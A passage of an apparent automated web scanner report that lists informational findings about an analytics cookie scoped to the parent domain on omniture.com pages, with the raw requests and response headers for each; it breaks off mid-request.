imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:14:58 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/resources/articles HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:14:58 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:14:58 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:14:58 GMT
Content-Length: 26730
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:14:58 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
   <title>Omniture | Articles</title>


...[SNIP]...

11.423. http://www.omniture.com/en/resources/case_studies previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/resources/case_studies

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:14:27 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/resources/case_studies HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:14:27 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:14:27 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:14:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:14:27 GMT; path=/; domain=omniture.com
Content-Length: 49831

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Success Stories | Online Busine
...[SNIP]...

11.424. http://www.omniture.com/en/resources/cmo.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/resources/cmo.com

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:15:37 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/resources/cmo.com HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:15:37 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:15:37 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:15:37 GMT
Content-Length: 22161
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:15:37 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
   <title>CMO.com by Omniture</title>


...[SNIP]...

11.425. http://www.omniture.com/en/resources/guides previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/resources/guides

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:14:04 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/resources/guides HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:14:04 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:14:04 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:14:04 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:14:04 GMT; path=/; domain=omniture.com
Content-Length: 46717

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Best Practices Guides | Online
...[SNIP]...

11.426. http://www.omniture.com/en/resources/testimonials previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/resources/testimonials

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:14:50 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/resources/testimonials HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:14:50 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:14:50 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:14:50 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:14:50 GMT; path=/; domain=omniture.com
Content-Length: 34476

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Testimonials | Online Business
...[SNIP]...

11.427. http://www.omniture.com/en/resources/webinars previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/resources/webinars

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:14:13 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/resources/webinars HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:14:13 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:14:13 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:14:13 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:14:13 GMT; path=/; domain=omniture.com
Content-Length: 48650

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Webinars | Online Business Opti
...[SNIP]...

11.428. http://www.omniture.com/en/services previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/services

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 18:57:55 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/services HTTP/1.1
Host: www.omniture.com
Proxy-Connection: keep-alive
Referer: http://www.omniture.com/en/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerhttp_omniture=84542986.5892.0000; omniture_unique=c4b47f0affb47cea2cd263f6285f016c; cms_site_lang=1; use207=7; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; s_cid=natural_bookmark; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cc=true; mbox=check#true#1296661307|session#1296661217505-786518#1296663089|PC#1296661217505-786518.17#1299080429; s_sv_p1=1@15@s/5084/5072&e/2; s_sv_s1=1@29@a//1296661247027/921914275979; _jsuid=9633613657349828981; s_sq=omniturecom%2Comnitureall%2Comniturecomdev%2Comniturecomemea%2Comnitureapac%2Comniturenoncustomer%2Comniturecomen%3D%2526pid%253DOmniture%25253A%252520Homepage%2526pidt%253D1%2526oid%253Dhttp%25253A//www.omniture.com/en/services%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 18:57:55 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 18:57:55 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Wed, 02 Feb 2011 18:57:55 GMT
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 18:57:55 GMT; path=/; domain=omniture.com
Content-Length: 24477

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Online Business Optimization Pl
...[SNIP]...

11.429. http://www.omniture.com/en/services/consulting previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/services/consulting

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:05:16 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/services/consulting HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:05:16 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:05:16 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:05:17 GMT
Content-Length: 27864
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:05:16 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Services Implementation | Onlin
...[SNIP]...

11.430. http://www.omniture.com/en/services/es previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/services/es

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:05:20 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/services/es HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:05:20 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:05:20 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:05:20 GMT
Content-Length: 24111
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:05:20 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>The Omniture Engineering Servic
...[SNIP]...

11.431. http://www.omniture.com/en/survey/5084 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/survey/5084

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:50:21 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/survey/5084 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Fri, 04 Feb 2011 05:50:21 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Thu, 03 Feb 2011 05:50:21 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 05:50:21 GMT
Content-Length: 4127
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:50:21 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
   <title>Omniture | Survey</title>

   <m
...[SNIP]...

11.432. http://www.omniture.com/en/surveys previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/surveys

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:15:36 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/surveys HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:15:36 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:15:36 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:15:36 GMT
Content-Length: 23548
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:15:36 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Online Marketing Surveys from A
...[SNIP]...

11.433. http://www.omniture.com/es previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/es

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:52:45 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /es HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Fri, 04 Feb 2011 05:52:45 GMT
Cache-Control: public, max-age=14400
Last-Modified: Thu, 03 Feb 2011 05:52:45 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 05:52:45 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cms_site_lang=7; expires=Sat, 05-Mar-2011 05:52:44 GMT; path=/; domain=omniture.com
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:52:45 GMT; path=/; domain=omniture.com
Content-Length: 37646

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//es" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="es" lang="es">
<head>
<title>Analisis Web | Le leader de l'o
...[SNIP]...

11.434. http://www.omniture.com/fr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/fr

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:53:26 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Fri, 04 Feb 2011 05:53:26 GMT
Cache-Control: public, max-age=14400
Last-Modified: Thu, 03 Feb 2011 05:53:26 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 05:53:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cms_site_lang=3; expires=Sat, 05-Mar-2011 05:53:26 GMT; path=/; domain=omniture.com
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:53:26 GMT; path=/; domain=omniture.com
Content-Length: 38083

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//fr" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="fr" lang="fr">
<head>
<title>Web analytics, Analyse de web |
...[SNIP]...

11.435. http://www.omniture.com/jp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/jp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:54:42 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jp HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
